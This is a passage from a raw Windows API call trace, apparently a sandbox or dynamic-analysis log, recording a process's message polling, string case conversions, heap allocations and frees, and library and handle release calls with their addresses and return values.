out: lpMsg=0x8bf0b0) returned 0 [0209.217] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0209.217] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.217] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.217] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.217] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.218] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.218] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.218] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0209.218] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.218] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0209.218] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.218] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.218] CryptReleaseContext (hProv=0xad2a50, dwFlags=0x0) returned 1 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0209.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0209.220] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0209.221] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0209.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0209.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0209.221] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0209.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0209.222] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0209.222] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0209.222] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.223] FreeLibrary (hLibModule=0x74d40000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.223] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.223] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0209.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.223] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.224] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.224] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa898 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0209.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa970 [0209.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0209.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0209.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.226] CloseHandle (hObject=0x2c4) returned 1 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0209.227] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0209.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0209.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0209.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0209.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0209.229] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 